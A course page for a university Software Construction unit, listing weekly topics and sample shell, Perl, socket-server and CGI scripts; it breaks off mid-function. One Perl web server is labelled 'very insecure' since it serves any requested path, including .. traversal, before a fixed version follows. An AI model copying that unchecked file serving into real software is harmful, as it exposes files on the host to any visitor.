COMP[29]041 17s2 Software Construction

COMP[29]041 Course Resources

Course Outline  Lecture recordings  Course Forum  Course Timetable  Home computing: vlab  Handbook COMP2041 COMP9041
Exam Information    Assignment 1 (draft automarking) Assignment 2 (Evan's Port Forwarding Tutorial Flask Tutorial)

COMP[29]041 Week-by-Week

Week 1

Wednesday Jul 26 lecture topics: Intro, Filters

Friday Jul 28 lecture topics: Filters

Week 2  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 02 lecture topics: Filters, Shell

Friday Aug 04 lecture topics: Shell


A simple shell script demonstrating access to arguments.

echo My name is $0
echo My process number is $$
echo I have $# arguments
echo My arguments separately are $*
echo My arguments together are "$@"
echo My 5th argument is "'$5'"

l [file|directories...] - list files

Short Shell scripts can be used for convenience.

Note: "$@", like $*, expands to the script's arguments, but it keeps each argument intact even if it contains spaces.

ls -las "$@"
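
To make the difference concrete, the following sketch passes the same two arguments through unquoted $* and through "$@" and counts what arrives. The helper names count_args, via_star and via_at are hypothetical, chosen only for this illustration.

```shell
#!/bin/sh
# count_args, via_star and via_at are hypothetical helper names.

# print how many arguments were received
count_args() {
    echo $#
}

# forward arguments using unquoted $* - arguments containing spaces are split
via_star() {
    count_args $*
}

# forward arguments using "$@" - each argument is passed on intact
via_at() {
    count_args "$@"
}

echo "unquoted \$* passes on $(via_star 'my file.txt' b.txt) arguments"
echo "quoted \"\$@\" passes on $(via_at 'my file.txt' b.txt) arguments"
```

With the default IFS, the first line reports 3 arguments and the second reports 2.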

Count the number of times each different word occurs in the files given as arguments, e.g. word_frequency.sh dracula.txt

sed 's/ /\n/g' "$@"|      # convert to one word per line
tr A-Z a-z|               # map uppercase to lower case
sed "s/[^a-z']//g"|       # remove all characters except a-z and '
egrep -v '^$'|            # remove empty lines
sort|                     # place words in alphabetical order
uniq -c|                  # use uniq to count how many times each word occurs
sort -n                   # order words in frequency of occurrence

Change the names of the specified files to lower case.

Note the use of test to check if the new filename differs from the old.

The perl utility rename provides a more general alternative.

Note without the double quotes below filenames containing spaces would be handled incorrectly.

Note also the use of -- to avoid mv interpreting a filename beginning with - as an option.

However, a file named -n or -e will still break the script, because echo will treat the name as an option.

if test $# = 0
then
    echo "Usage $0: <files>" 1>&2
    exit 1
fi

for filename in "$@"
do
    new_filename=`echo "$filename" | tr A-Z a-z`
    test "$filename" = "$new_filename" && continue
    if test -r "$new_filename"
    then
        echo "$0: $new_filename exists" 1>&2
    elif test -e "$filename"
    then
        mv -- "$filename" "$new_filename"
    else
        echo "$0: $filename not found" 1>&2
    fi
done
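
One possible way around the echo problem, sketched here as an assumption and not part of the script above, is to print the filename with printf '%s\n', which never treats its data as an option. The helper name to_lower is hypothetical.

```shell
#!/bin/sh
# to_lower is a hypothetical helper name.
# printf '%s\n' prints its argument literally, so a filename such as -n
# is not mistaken for an option as it can be with echo.
to_lower() {
    printf '%s\n' "$1" | tr A-Z a-z
}

to_lower 'Holiday Photo.JPG'
to_lower '-N'
```

In the renaming loop the assignment would then read new_filename=`to_lower "$filename"`.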

Week 3  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 09 lecture topics: Shell

Friday Aug 11 lecture topics: Shell


Repeatedly download a specified web page until a specified regexp matches its source then notify the specified email address.

For example:

repeat_seconds=300  #check every 5 minutes

if test $# = 3
then
    url=$1
    regexp=$2
    email_address=$3
else
    echo "Usage: $0 <url> <regex> <email-address>" 1>&2
    exit 1
fi

while true
do
    if wget -O- -q "$url"|egrep "$regexp" >/dev/null
    then
        echo "Generated by $0" | mail -s "$url now matches $regexp" "$email_address"
        exit 0
    fi
    sleep $repeat_seconds
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if test $# = 1
then
    start=1
    finish=$1
elif test $# = 2
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while test $number -le $finish
do
    echo $number
    number=`expr $number + 1`    # or number=$(($number + 1))
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

This version uses bash's (( )) arithmetic syntax in place of test and expr.

if (($# == 1))
then
    start=1
    finish=$1
elif (($# == 2))
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while ((number <= finish))
do
    echo $number
    number=$((number + 1))
done

Run as plagiarism_detection.simple_diff.sh <files>

Report if any of the files are copies of each other

The use of diff -iw means changes in white-space or case won't affect comparisons

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break
        if diff -i -w "$file1" "$file2" >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done

Improved version of plagiarism_detection.simple_diff.sh

The substitution s/\/\/.*// removes // style C comments.

This means changes in comments won't affect comparisons.

Note use of temporary files

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$


for file1 in "$@"
do
    for file2 in "$@"
    do
        if test "$file1" = "$file2"
        then
            break # avoid comparing pairs of assignments twice
        fi
        sed 's/\/\/.*//' "$file1" >$TMP_FILE1
        sed 's/\/\/.*//' "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2
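
Temporary file names built from $$ are predictable, and the final rm is skipped if the script is interrupted. One possible hardening, sketched here as an assumption and not part of the course script, is to create the files with mktemp and remove them with trap. The function name same_without_comments is hypothetical.

```shell
#!/bin/sh
# Sketch only: same_without_comments is a hypothetical helper name.
# mktemp creates uniquely named temporary files,
# and the trap removes them however the script exits.
TMP_FILE1=$(mktemp) || exit 1
TMP_FILE2=$(mktemp) || exit 1
trap 'rm -f "$TMP_FILE1" "$TMP_FILE2"' EXIT

# succeed if two C files are identical ignoring // comments, case and white space
same_without_comments() {
    sed 's/\/\/.*//' "$1" >"$TMP_FILE1"
    sed 's/\/\/.*//' "$2" >"$TMP_FILE2"
    diff -i -w "$TMP_FILE1" "$TMP_FILE2" >/dev/null
}

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # avoid comparing pairs twice
        same_without_comments "$file1" "$file2" && echo "$file1 is a copy of $file2"
    done
done
```

Quoting the temporary file names also keeps the script working if TMPDIR contains spaces.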

Improved version of plagiarism_detection.comments.sh

This version converts C strings to the letter 's' and it converts identifiers to the letter 'v'.

Hence changes in strings & identifiers won't prevent detection of plagiarism.

The substitution s/"[^"]*"/s/g changes strings to the letter 's'

This pattern won't match a few C strings which is fine for our purposes

The s/[a-zA-Z_][a-zA-Z0-9_]*/v/g changes all variable names to 'v' which means changes to variable names won't affect comparison.

Note this also may change function names, keywords etc.

This is fine for our purposes.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1" >$TMP_FILE1
        sed "$substitutions" "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2
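
The effect of the three substitutions is easiest to see on a single line of C. The sketch below is based on the substitutions described above, with the string pattern written as "[^"]*" so that strings of any length match; the helper name normalise and the sample C lines are hypothetical.

```shell
#!/bin/sh
# normalise is a hypothetical helper name; the sample C lines are made up.
# 1. remove // comments  2. replace strings with s  3. replace identifiers with v
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

normalise() {
    printf '%s\n' "$1" | sed "$substitutions"
}

normalise 'printf("hello %d", count);// greet the user'
normalise 'puts("bye"); total = total + 1;'
```

The first line becomes v(v, v); and the second becomes v(v); v = v + 1; because the s that replaces each string is itself then treated as an identifier.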

Week 4  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 16 lecture topics: Shell, Perl Intro

Friday Aug 18 lecture topics: Perl Intro, Perl Arrays


Improved version of plagiarism_detection.identifiers.sh

Note the use of sort so line reordering won't prevent detection of plagiarism.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1"|sort >$TMP_FILE1
        sed "$substitutions" "$file2"|sort >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.reordering.sh

Note the use of md5sum to calculate a cryptographic hash of the modified file (http://en.wikipedia.org/wiki/MD5), and then the use of sort and uniq to find files with the same hash.

This allows execution time linear in the number of files

substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file in "$@"
do
    echo `sed "$substitutions" "$file"|sort|md5sum` $file
done|
sort|
uniq -w32 -d --all-repeated=separate|
cut -c36-
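
The hashing idea can be tried on a few throwaway files. The sketch below assumes GNU coreutils (md5sum and uniq -w); the directory, the file names and the helper fingerprint are hypothetical, and only the sort step of the normalisation is kept for brevity.

```shell
#!/bin/sh
# Assumes GNU coreutils (md5sum, uniq -w); all names here are hypothetical.
dir=$(mktemp -d)
printf 'b\na\n' >"$dir/one.txt"
printf 'a\nb\n' >"$dir/two.txt"      # same lines as one.txt in a different order
printf 'a\nc\n' >"$dir/three.txt"

# print the 32 character MD5 hash of a file's sorted lines
fingerprint() {
    sort "$1" | md5sum | cut -c1-32
}

# each file is hashed once, then files with equal hashes are grouped
for file in "$dir"/*.txt
do
    echo "$(fingerprint "$file") $file"
done |
sort |
uniq -w32 --all-repeated=separate |
cut -c34-
rm -r "$dir"
```

Only one.txt and two.txt are listed, because sorting their lines gives identical input to md5sum.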

compute Pythagoras' Theorem

print "Enter x: ";
$x = <STDIN>;
chomp $x;
print "Enter y: ";
$y = <STDIN>;
chomp $y;
$pythagoras = sqrt $x * $x + $y * $y;
print "The square root of $x squared + $y squared is $pythagoras\n";

Read numbers until end of input (or a non-number) is reached then print the sum of the numbers

$sum = 0;
while ($line = <STDIN>) {
    $line =~ s/^\s*//; # remove leading white space
    $line =~ s/\s*$//; # remove trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if ($line !~ /^\d[.\d]*$/) {
        last;
    }
    $sum += $line;
}
print "Sum of the numbers is $sum\n";

Simple example reading a line of input and examining characters

printf "Enter some input: ";
$line = <STDIN>;
if (!defined $line) {
	die "$0: could not read any characters\n";
}
chomp $line;
$n_chars = length $line;
print "That line contained $n_chars characters\n";
if ($n_chars > 0) {
	$first_char = substr($line, 0, 1);
	$last_char = substr($line, $n_chars - 1, 1);
	print "The first character was '$first_char'\n";
	print "The last character was '$last_char'\n";
}

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

print "Enter line: ";
$last_line = <STDIN>;
print "Enter line: ";
while ($line = <STDIN>) {
	if ($line eq $last_line) {
		print "Snap!\n";
	}
    $last_line = $line;
	print "Enter line: ";
}

create a string of size 2^n by concatenation

die "Usage: $0 <n>\n" if @ARGV != 1;
$n = 0;
$string = '@';
while ($n  < $ARGV[0]) {
    $string = "$string$string";
    $n++;
}
printf "String of 2^%d = %d characters created\n", $n, length $string;

Perl implementation of /bin/echo. This version always writes a trailing space.

foreach $arg (@ARGV) {
    print $arg, " ";
}
print "\n";

Perl implementation of /bin/echo

print "@ARGV\n";

Perl implementation of /bin/echo

print join(" ", @ARGV), "\n";

while (1) {
    print "Enter array index: ";
    $n = <STDIN>;
    if (!$n) {
        last;
    }
    chomp $n;
    $a[$n] = 42;
    print "Array element $n now contains $a[$n]\n";
    printf "Array size is now %d\n", $#a+1;
}

Sum integers supplied as command line arguments. There is no check that the arguments are numeric.

$sum = 0;
foreach $arg (@ARGV) {
	$sum += $arg;
}
print "Sum of the numbers is $sum\n";

Count the number of lines on standard input.

$line_count = 0;
while (1) {
    $line = <STDIN>;
    last if !$line;
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - slightly more concise

$line_count = 0;
while (<STDIN>) {
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input. Read the input into an array and use the array size.

@lines = <STDIN>;
print $#lines+1, " lines\n";

Print lines read from stdin in reverse order.

In a C-style

while ($line = <STDIN>) {
    $line[$line_number++] = $line;
}


for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context

@line = <STDIN>;
for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context & reverse

@lines = <STDIN>;
print reverse @lines;


Simple cp implementation using line by line I/O

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

while ($line = <$in>) {
    print $out $line;
}

close $in;
close $out;
exit 0;

Simple cp implementation reading the entire file into an array. Note that <> returns an array of lines in a list context (in a scalar context it returns a single line).

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
@lines = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out @lines;
close $out;

exit 0;

Week 5  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Aug 23 lecture topics: Perl Arrays, Perl Regex

Friday Aug 25 lecture topics: Perl Regex


Reads lines of input until end-of-input

Print snap! if a line has been seen previously

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	if (!defined $line) {
		last;
	}
	if ($seen{$line}) {
		print "Snap!\n";
	}
	$seen{$line}++;
}

Run as ./expel_student mark_deductions.txt. Find the student with the largest mark deductions and expel them.

while ($line = <>) {
    chomp $line;
    $line =~ s/^"//;
    $line =~ s/"$//;
    my ($name,$offence,$date,$penalty);
    ($name,$offence,$date,$penalty) = split /"\s*,\s*"/, $line;
    $penalty =~ s/[^0-9]//g;
    $deduction{$name} += $penalty;
}

$worst = 0;
foreach $student (keys %deduction) {
    $penalty = $deduction{$student};
    if ($penalty > $worst) {
        $worst_student = $student;
        $worst = $penalty;
    }
}
print "Expel $worst_student who had $worst marks deducted\n";

Fetch a web page, removing HTML tags and character entities (e.g. &amp;)

Lines between script or style tags are skipped.

Non-blank lines are printed

There are better ways to fetch web pages (e.g. HTTP::Request::Common)

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

foreach $url (@ARGV) {
    open my $f, '-|', "wget -q -O- '$url'" or die;
    while ($line = <$f>) {
        if ($line =~ /^\s*<(script|style)/i) {
            while ($line = <$f>) {
                last if $line =~ /^\s*<\/(script|style)/i;
            }
        } else {
            $line =~ s/&\w+;/ /g;
            $line =~ s/<[^>]*>//g;
            print $line if $line =~ /\S/;
        }
    }
    close $f;
}

Week 6  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Aug 30 lecture topics: Perl Regex

Friday Sep 1 lecture topics: Perl Functions


For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in a new file which is then renamed to replace the old file

foreach $filename (@ARGV) {
    $tmp_filename = "$filename.new";
    die "$0: $tmp_filename already exists" if -e "$tmp_filename";
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    open my $g, '>', $tmp_filename or die "$0: Can not open $tmp_filename : $!";
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        print $g $line;
    }
    close $f;
    close $g;
    rename "$tmp_filename", $filename or die "$0: Can not rename file";
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    $line_count = 0;
    @new_lines = ();    # discard lines left over from the previous file
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        $new_lines[$line_count++] = $line;
    }
    close $f;
    open my $g, '>', $filename or die "$0: Can not open $filename : $!";
    print $g @new_lines;
    close $g;
}

Print the last number (real or integer) on every line if there is one.

Note regexp to match number: -?\d+(\.\d+)?

while ($line = <>) {
	if ($line =~ /(-?\d+(\.\d+)?)\D*$/) {
		print "$1\n";
	}
}

Run as course_first_names.pl enrollments. Report cases where multiple people with the same first name are enrolled in a course.

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}




This shows a bug due to a missing my declaration

In this case the use of $i in is_prime without a my declaration changes $i outside the function and breaks the while loop calling the function

sub is_prime {
	my ($n) = @_;
	$i = 2;    # deliberate bug: no my, so this is the global $i used by the loop below
	while ($i < $n) {
		return 0 if $n % $i == 0;
		$i++;
	}
	return 1;
}

$i = 0;
while ($i < 1000) {
	print "$i\n" if is_prime($i);
	$i++;
}
		

3 different ways to sum a list - illustrating various aspects of Perl

simple for loop

sub sum_list0 {
    my (@list) = @_;
    my $total = 0;
    foreach $element (@list) {
       $total += $element;
    }
    return $total;
}

# recursive
sub sum_list1 {
    my (@list) = @_;
    return 0 if !@list;
    return $list[0] + sum_list1(@list[1..$#list]);
}

# join+eval - interesting but not recommended
sub sum_list2 {
    my (@list) = @_;
    return eval(join("+", @list))
}

print sum_list0(1..10), " ", sum_list1(1..10), " ", sum_list2(1..10),  "\n";

8 different ways to print the odd numbers in a list - illustrating various aspects of Perl

simple for loop

sub print_odd0 {
    my (@list) = @_;
    foreach $element (@list) {
        print "$element\n" if $element % 2;
    }
}

# simple for loop using index
sub print_odd1 {
    my (@list) = @_;
    foreach $i (0..$#list) {
        print "$list[$i]\n" if $list[$i] % 2;
    }
}

# set $_ in turn to each item in list
# evaluate supplied expression
# print item if the expression evaluates to true
sub print_list0 {
    my ($select_expression, @list) = @_;
    foreach $_ (@list) {
        print "$_\n" if &$select_expression;
    }
}

# calling helper function which prints
# items selected by an expression
sub print_odd2 {
    print_list0(sub {$_ % 2}, @_);
}

sub odd {
    return $_[0] % 2;
}

# more concise version of print_list0
sub print_list1 {
   &{$_[0]} && print "$_\n" foreach @_[1..$#_];
}

# calling helper function which prints
# items selected by an expression
sub print_odd3 {
    print_list1(sub {odd $_}, @_);
}

# set $_ in turn to each item in list
# evaluate supplied expression
# return a list of items for which the expression evaluated to true
sub my_grep0 {
    my $select_expression = $_[0];
    my @matching_elements;
    foreach $_ (@_[1..$#_]) {
        push @matching_elements, $_ if &$select_expression;
    }
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd4 {
    foreach $x (my_grep0 sub {$_ % 2}, @_) {
        print "$x\n";
    }
}


# more concise version of my_grep0
sub my_grep1 {
    my $select_expression = shift;
    my @matching_elements;
    &$select_expression && push @matching_elements, $_ foreach @_;
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd5 {
    my_grep1 sub {odd($_) && print "$_\n"}, @_;    # parentheses needed: odd $_ && ... would parse as odd($_ && ...)
}

# using built-in grep and combining print
sub print_odd6 {
    grep {$_ % 2 && print "$_\n"} @_;
}

# using built-in grep and join
sub print_odd7 {
    print join("\n", grep {$_ % 2} @_), "\n";
}


@a = (1..10);
foreach $version (0..7) {
    print "print_odd$version\n";
    &{"print_odd$version"}(@a);
}

Week 7  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Week 8  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Week 9  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Sep 20 lecture topics: Web

Friday Sep 22 lecture topics: CGI


Simple Perl TCP/IP server. Access it with telnet localhost 4242.

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 4242, Listen => SOMAXCONN) or die;

while ($c = $server->accept()) {
    printf STDERR "[Connection from %s]\n", $c->peerhost;
    print $c scalar localtime,"\n";
    close $c;
}

simple Perl TCP/IP client

use IO::Socket;
$server_host =  $ARGV[0] || 'localhost';
$server_port = 4242;
$c = IO::Socket::INET->new(PeerAddr => $server_host, PeerPort  => $server_port) or die;
$time = <$c>;
close $c;
print "Time is $time\n";

Fetch files via HTTP from the web server at the specified URL. See HTTP::Request::Common for a more general solution.

use IO::Socket;
foreach $url (@ARGV) {
    # the host pattern excludes : so that an optional port is captured in $3
    $url =~ /http:\/\/([^\/:]+)(:(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $1, PeerPort => $3 || 80) or die;
    # send request for web page to server
    print $c "GET $4 HTTP/1.0\n\n";
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}

Listen on port 2041 for incoming connections, print their details to stdout, then send back a 404 status code.

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    print $c "HTTP/1.0 404 This webserver always returns a 404 status code\n";
    close $c;
}

Listen on port 2041 for incoming connections, print their details to stdout, then send back a 200 status code and a short plain-text message.

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this web server at http://localhost:2041/\n\n";

$content = "Everything is OK - you will pass COMP[29]041.\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    
    # print header
    print $c "HTTP/1.0 200 OK\n";
    print $c "Content-Type: text/plain\n";
    printf $c "Content-Length: %d\n\n", length($content);

    print $c $content;
    close $c;
}

Return files in response to incoming HTTP requests to port 2041. Note that this does not check that the request is well-formed or that the file exists. It is also very insecure, as the pathname may contain ..

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        my $request = <$c>;
        print "Connection from ", $c->peerhost, ": $request";
        $request =~ /^GET (.+) HTTP\/1.[01]\s*$/;
        print "Sending back /home/cs2041/public_html/$1\n";
        open my $f, '<',"/home/cs2041/public_html/$1";
        $content = join "", <$f>;
        close $f;
        print $c "HTTP/1.0 200 OK\n";
        print $c "Content-Type: text/html\n";
        printf $c "Content-Length: %d\n\n", length($content);
        print $c $content;
        close $c;
    }
}

return files in response to incoming http requests to port 2041, determine appropriate mime type using /etc/mime.types

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

open my $mt, '<', "/etc/mime.types" or die "Can not open /etc/mime.types: $!\n";
while ($line = <$mt>) {
    $line =~ s/#.*//;
    my ($mime_type, @extensions) = split /\s+/, $line;
    foreach $extension (@extensions) {
        $mime_type{$extension} = $mime_type;
    }
}
close $mt;
while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        print "waiting for connection";
        my $request = <$c>;
        last if !$request;
        printf "Connection from %s, request: $request", $c->peerhost;
        my $content_type = "text/plain";
        my $status_line = "400 BAD REQUEST";
        my $content = "";

        if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
            # remove any occurrences of .. from pathname to prevent access outside 2041 directory
            $url =~ s/(^|\/)\.\.(\/|$)//g;
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;

            print "$file requested\n";
            if (open my $f, '<', $file) {
                my ($extension) = $file =~ /\.(\w+)$/;
                $status_line = "200 OK";
                $content_type = $mime_type{$extension} if $extension && $mime_type{$extension};
                $content = join "", <$f>;
            } else {
                $status_line = "404 FILE NOT FOUND";
                $content = "File $file not found\n";
            }
        }

        my $header = sprintf "HTTP/1.0 $status_line\nContent-Type: $content_type\nContent-Length: %d\n\n", length($content);
        print "Sending this header:\n", $header;

        print $c $header, $content;
        close $c;
    }
}

Output some simple HTML

echo 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>'

Output some simple HTML

use CGI qw/:all/;

print header,
      start_html('Hello World'),
      h2('Hello World'),
      end_html;

Print some HTML plus information about the environment in which the CGI script has been run

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
eof

for command in pwd id hostname 'uname -a'
do
    echo "$command: `$command`"
done

cat <<eof
</pre>
</body>
</html>
eof


Print some HTML plus the environment passed to CGI script by the web server

Note: a < character in an environment variable's value will be interpreted by the browser as the start of an HTML tag.

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
`env`
</pre>
</body>
</html>
eof
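
One possible way to avoid this, sketched here as an assumption and not part of the script above, is to pass the output of env through sed so that &, < and > are replaced with HTML entities. The helper name html_escape is hypothetical.

```shell
#!/bin/sh
# html_escape is a hypothetical helper name.
# & must be replaced first, otherwise the & in &lt; and &gt; would be escaped again.
html_escape() {
    sed 's/&/\&amp;/g; s/</\&lt;/g; s/>/\&gt;/g'
}

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
`env | html_escape`
</pre>
</body>
</html>
eof
```

The browser then displays the characters literally instead of treating them as markup.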


Pick a random image from a directory and overlay the image with its filename using ImageMagick.

$directory = "./images";
foreach $file (glob "$directory/*.jpg") {
    next if !-r $file;
    push @files, $file;
}

$random_file = $files[rand @files];
$name = $random_file;
$name =~ s/\.jpg$//;
$name =~ s/.*\///;
$name =~ s/[\-_]/ /g;
$name =~ s/[^\w\s]//g;
$convert_options = "-gravity south -pointsize 72 -stroke '#0004' -strokewidth 2 -annotate 0 '$name' -stroke none -fill white -annotate 0 '$name'";
print "Content-type: image/jpeg\n\n";
system "convert '$random_file' $convert_options -"

Week 10  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Oct 04 lecture topics: CGI

Friday Oct 06 lecture topics: CGI


Outputs a form which will rerun the script

cat <<eof
Content-type: text/html

<html><head><title>Self replicating Form</title></head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string">
</form>
<p>
eof

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Sums two numbers and outputs a form which will rerun the script

Note removal of characters other than 0-9 . - + to avoid potential security problems

if test "$REQUEST_METHOD" = "GET"
then
    parameters="$QUERY_STRING"
else
    read parameters
fi

x=`echo $parameters|sed '
    s/.*x=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`
y=`echo $parameters|sed '
    s/.*y=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Sum Two Numbers</title>
</head>
<body>
eof

sum="?"
test "$x" -a "$y" && sum=`expr "$x" '+' "$y"`

cat <<eof

<form method="GET" action="">
<input type="text" name="x" value="$x">
+
<input type="text" name="y" value="$y">
=
$sum
<input type="submit" value="calculate">
</form>
</body>
</html>
eof
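
The parameter extraction and sanitising step can be tried outside a web server. In the sketch below the helper name get_param and the sample query strings are hypothetical. It follows the same three sed substitutions as the script, so it shares their limitations, for example it assumes the parameter is present in the query string.

```shell
#!/bin/sh
# get_param is a hypothetical helper name, not part of the script above.
# usage: get_param <name> <query-string>
# Prints the value of the named parameter with every character other than
# digits, '.', '+' and '-' removed.
get_param() {
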